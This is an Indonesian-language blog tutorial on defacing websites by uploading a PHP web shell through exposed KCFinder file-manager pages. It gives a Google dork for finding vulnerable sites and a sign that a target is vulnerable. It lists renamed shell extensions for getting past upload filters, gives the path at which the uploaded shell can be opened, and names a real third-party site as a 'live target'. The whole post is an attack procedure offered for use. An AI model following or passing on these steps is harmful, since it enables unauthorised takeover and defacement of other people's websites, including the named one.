Tutorial Deface Kcfinder Upload Shell (Basic) - Indonesian Code Party

Tutorial Deface Kcfinder Upload Shell (Basic)

Tutorial Deface Kcfinder Upload Shell


Oke gua hari ini mau share Tutorial Deface Kcfinder Upload Shell

Mungkin buat Kalian ada yang Belom Tau Tutorial ini Caranya Cukup Simple Bagi pemula ;).

Oke langsung saja

Bahan :
> Dork
> Shell
> Internet
> Kopi


DORK: inurl:/kcfinder/upload/ sisanya? Use Your Brain :)
Exploit: www.target.com/[path]/kcfinder/upload.php or browse.php

1. Langkah Pertama Cari dulu menggunakan Dork diatas Melalui Google Image, Nah Karna disini gua udah dapet Site nya jadi langsung aja Ok
Ciri Ciri Target Vuln? pas buka upload.php ada notice "Unknown Error"




2. Kalo udah muncul Gitu Langsung aja Buka www.target.com/kcfinder/browse.php


3. kalo udah Keliatan Seperti itu Tinggal kalian Upload shell kalian :) Sebelum Upload shell kalian ubah extensi shell kalian terlebih dahulu agar bisa ke upload.
Type extensi Shell: .php.fla, .php2, .php5, .php56, .php.pjpg


4. Kalo udah ke upload tinggal Kalian Akses file kalian tadi
Caranya: www.target.com/[PATH]/kcfinder/upload/files/shell.php

LIVE TARGET: https://www.judoverenigingdeusone.nl/kcfinder/browse.php

Sekian Terimakasih :'D



Posting Komentar

0 Komentar